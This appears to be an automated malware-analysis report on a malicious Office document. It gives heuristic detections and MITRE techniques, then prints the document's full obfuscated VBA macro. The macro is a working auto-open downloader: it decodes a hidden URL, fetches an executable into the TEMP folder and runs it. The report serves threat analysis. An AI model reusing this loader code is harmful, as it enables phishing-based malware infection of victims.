MALICIOUS
Risk Score: 332

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros with multiple auto-execution triggers (Auto_Open, AutoOpen). These macros utilize CreateObject and Shell calls, indicating an attempt to download and execute a secondary payload. The presence of the email address 'facepa1m@live.ru' within the document's metadata suggests a potential phishing lure.

Heuristics: 11

- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
  `Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  `Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Sub AutoOpen()`
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  `Sub Workbook_Open()`
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script:
  `Sub Auto_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script:
  `OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22028 bytes |

SHA-256: f0f7e02ac879d1c16548421e122bb9093fe21c24f0f5e83be7a406ce788d6150

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln
Dim yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6267746C6769776F71786A746A776366746F717363787A676D76616579646974776B7A6E76716E657877626C6B637A")) For Binary As #6384
Put #6384, , yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz
Close #6384
imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln:
GoTo qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse
Dim vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626379736962776671637962616E726C7373666977687A63676C626E6465786E72666375796D6C6E70727A6A686870")) For Binary As #34446
Put #34446, , vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv
Close #34446
qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse:
GoTo smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj
Dim jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6C6169707A7668656E6B7A7479696F6D6A767A68636D65666F77746A686265646D726F6E656E766970646676766373")) For Binary As #36904
Put #36904, , jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax
Close #36904
smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr
Dim crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("66657561766C6C6E6176707776767566727561676376747A66627972726267707864646B7A6662716A6F7570616D6773")) For Binary As #43632
Put #43632, , crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Close #43632
fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr:
GoTo vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx
Dim qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636C7873776E7179776D6663616E616D797A7773786679786679767275716677726464666F64666B6D77797562637967")) For Binary As #13653
Put #13653, , qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual
Close #13653
vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx:
GoTo tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply
Dim eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6A6C6871746477686C68796566726A7967686B686A776A6B6777686D6E6276657476787178616D67696C6F6177616B")) For Binary As #41695
Put #41695, , eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue
Close #41695
tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq
Dim dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E7266636D737576777A776675616D6A6B757969637A7363737A796A6E6D726A61626E6A7571686C7071747669786469")) For Binary As #49957
Put #49957, , dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Close #49957
ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq:
GoTo hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm
Dim kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69617A61796665776F78646D746C70637A676D736977616562736C786E676D686169686D6D697367686D656765716A78")) For Binary As #14350
Put #14350, , kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug
Close #14350
hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm:
GoTo ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh
Dim mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("727A6C6B7A697877706D6870686A6761746766666D677A726F6D64616563746B6565747A6C7876656C796D6E686C7867")) For Binary As #34623
Put #34623, , mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Close #34623
ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh:
Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte
GoTo etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny
Dim kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("79796774646A676D6D6A6166766E7666646A6C6277727A65766D616B6D74736B6B6B6174786269796D76696D66617564")) For Binary As #46512
Put #46512, , kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd
Close #46512
etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny:
GoTo jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb
Dim zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636E736671657761666C6172776974687A74746373646965636B766E7562686375717977626E786E7573736B686A7275")) For Binary As #17297
Put #17297, , zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl
Close #17297
jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb:
Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
GoTo pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk
Dim gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6472767373796467716976697778686172696B69636B7A68716B796468707075677879797474646B7363786F716F7771")) For Binary As #67645
Put #67645, , gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu
Close #67645
pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk:
GoTo iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd
Dim jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72677577626E6F7175726F6371796B676A79716D6A627867666F7277626F787173656A63796F68757564666F6D676364")) For Binary As #23692
Put #23692, , jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm
Close #23692
iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd:
GoTo crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Dim hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666E687179626A7770647A626D73736A6A72636F746D646B727172776578637674796D6261766F61676E66716D657161")) For Binary As #69554
Put #69554, , hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio
Close #69554
crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi:
WQTQGAKEBGH.Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("544547")), XDQPBMZWZVE, False
GoTo yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo
Dim ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("75686E786874646371726B7563696D706766636C6866617270737779777272686678706774726B73796F7864746F6576")) For Binary As #16460
Put #16460, , ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius
Close #16460
yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo:
GoTo nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm
Dim cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6A6F656772767075687071756F6B6F6D706B64786572696A62766D7A67727161726C686E6F74716D61706B6F687061")) For Binary As #64341
Put #64341, , cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz
Close #64341
nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm:
GoTo adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih
Dim xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("62796E736B646B7471776E66696268746878677A7163656F72746E6F736877756663696276727773657A716A73706B6B")) For Binary As #97034
Put #97034, , xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw
Close #97034
adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih:
WQTQGAKEBGH.Send "send request"
GoTo dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Dim jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C74636564757A697569746F6A69656A757064787166717475766E6668617A796F67766D66617866726C746263647764")) For Binary As #97193
Put #97193, , jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc
Close #97193
dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw:
GoTo hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb
Dim uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6568766564676575626A6373766562736A7569656A6C61697173726D75747168656670646C737774776B6C696C767377")) For Binary As #46676
Put #46676, , uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn
Close #46676
hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb:
GoTo mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Dim arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F6D766665707867636B627867766278656968727568646570666A6270756C6D677068727274627A687A656E79756668")) For Binary As #90494
Put #90494, , arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf
Close #90494
mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm:
Do While WQTQGAKEBGH.readyState <> 4
GoTo phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf
Dim ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69776E6A6D746368626975746F737A796B77696C7A6F74756267786D6A646F75666E76706A726F6968766B6665637163")) For Binary As #96367
Put #96367, , ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg
Close #96367
phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf:
GoTo ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm
Dim wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6373726869696E6F756F79726B646E756E686F73696D706368756C69686268796672786B62786E667472706E676A7974")) For Binary As #5726
Put #5726, , wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq
Close #5726
ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm:
GoTo ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn
Dim bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A786664736963796569646F776B67736C6A6E646D65726163686477757A7769616E766D6D716C716977646167636E73")) For Binary As #14676
Put #14676, , bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp
Close #14676
ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn:
DoEvents
GoTo hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz
Dim nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626979656661726C6873676A6E6F6465656B677466796879747269617074716B7A646E666971736F6A686771697765")) For Binary As #23763
Put #23763, , nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb
Close #23763
hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz:
GoTo qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq
Dim eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6669786C7274756A7776787163686A78757778726E766D6E626177696B66736372676D6361646A6B7665667A65627775")) For Binary As #56197
Put #56197, , eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu
Close #56197
qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq:
GoTo bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx
Dim vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6873726E786D6A656A62696164666A656E636F6466696C6D7867696A6D686C7471796678707074727371626F76656D70")) For Binary As #43904
Put #43904, , vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep
Close #43904
bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx:
Loop
GoTo eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer
Dim vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666C79757578746678646163786271716F6C6B627A746861786678766F6472706C696F747A6F627A776B6B7663746B71")) For Binary As #95145
Put #95145, , vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi
Close #95145
eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer:
GoTo aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk
Dim hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C78746E63796E7175746E657A6E706B7570687A61786D6479716764776F6E6764726D62627A6676616C707771687561")) For Binary As #37532
Put #37532, , hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc
Close #37532
aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk:
GoTo cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy
Dim zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E666B78646E6B756D75746D6C676B747A627261666264726E776975666668766E737261716B6177716A6178636E6669")) For Binary As #93158
Put #93158, , zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare
Close #93158
cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy:
WGZWKGZMUTY = WQTQGAKEBGH.responseBody
GoTo ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh
Dim dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766B7161756870656B616768766E666F6F6671756F656F78757961756D676964656F796E77787173627A736469797479")) For Binary As #28613
Put #28613, , dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq
Close #28613
ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh:
GoTo cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp
Dim sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("617161727568786B6E7A6E64717062646F62726F6C77777475746A666B74706A71687663736D617368737263706E636A")) For Binary As #44114
Put #44114, , sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr
Close #44114
cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp:
GoTo zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek
Dim wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("706F6A6A746675736F6867686E666774636168616569737374787065756C766A727765716E63796F6E69776C726B626A")) For Binary As #63553
Put #63553, , wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah
Close #63553
zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek:
JFDTBJWPCNU = FreeFile
GoTo qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg
Dim lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72696B7672646E7972687467646A6E6B706E77766263657A6B686C776961636B6E6D666E6C6B637674676F7361767672")) For Binary As #56956
Put #56956, , lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm
Close #56956
qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg:
GoTo wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt
Dim ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("676375666371726F7975616B746B73716862617464677161716A6E6A686E626D73777166686F66797073797477646D6F")) For Binary As #60915
Put #60915, , ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi
Close #60915
wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt:
GoTo aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi
Dim tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F7A696661767576636D74666F6A746A7A7575676A6A6778747A716A6E6D73737065757567736F786D626467646B7173")) For Binary As #34306
Put #34306, , tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Close #34306
aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi:
If Dir(EBDHKIKBOCB) <> StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("")) Then Kill EBDHKIKBOCB
Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
Put #JFDTBJWPCNU, , WGZWKGZMUTY
Close #JFDTBJWPCNU
GoTo fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba
Dim gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("74686A6A726F6A636B74626E6578667A6B6565676E7763726C6B6B70766C6E61626C65697A6A7779787467646D68616D")) For Binary As #99823
Put #99823, , gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs
Close #99823
fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba:
GoTo qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq
Dim irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("797661796D71726A65776E6A66787976696E7774646C7A786E6C6E6E78776C697166747A616D76746C6D666462767964")) For Binary As #66032
Put #66032, , irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes
Close #66032
qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq:
GoTo dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc
Dim mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("646A71767067786F736A6C7763737661627279676E646275686E6B6A7A727573716D6879727061727A6E617768636266")) For Binary As #40444
Put #40444, , mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu
Close #40444
dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc:
Dim WBVSWOEAZVI
GoTo dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx
Dim psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6F70747A646F62716B6871747A77716565637970656F697A6A6D7A6E646A626F656A7563616E73657A6268796C636A")) For Binary As #66538
Put #66538, , psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx
Close #66538
dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx:
GoTo pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly
Dim ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6B6A6474627A6F7378777A7A696C6A76706D766A656B6872647266677479646A65626B766267716776716262676676")) For Binary As #34151
Put #34151, , ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe
Close #34151
pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly:
GoTo msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy
Dim nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766363796A66617577786C7761617777767A6F78787461746D707A62696475627574776C796E7975687973716E777566")) For Binary As #13237
Put #13237, , nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq
Close #13237
msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy:
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
GoTo bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh
Dim iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766C6A6E7A69716F6474776568776E706E6966677069757A78726474687A6B6C6B75756562627465626D6471746C6966")) For Binary As #76791
Put #76791, , iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq
Close #76791
bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh:
GoTo uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl
Dim gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756E67756F766D667A6B796678736163796E76716C726E656C6C6673686563786E6B6E6E706B616B6575636261667071")) For Binary As #37069
Put #37069, , gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed
Close #37069
uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl:
Set WQTQGAKEBGH = Nothing
GoTo tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd
Dim jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("7A6A68697470626C7274796D6B69716D77796B6C7268657879636F7A76696D6D777A7873717A6477686162716569617A")) For Binary As #47174
Put #47174, , jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck
Close #47174
tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd:
GoTo iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq
Dim okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6268727077696F7366767677677470777372746467746862717070647374776D676F6E7869786C706769686D64777272")) For Binary As #21343
Put #21343, , okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw
Close #21343
iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq:
GoTo tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Dim tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis As String
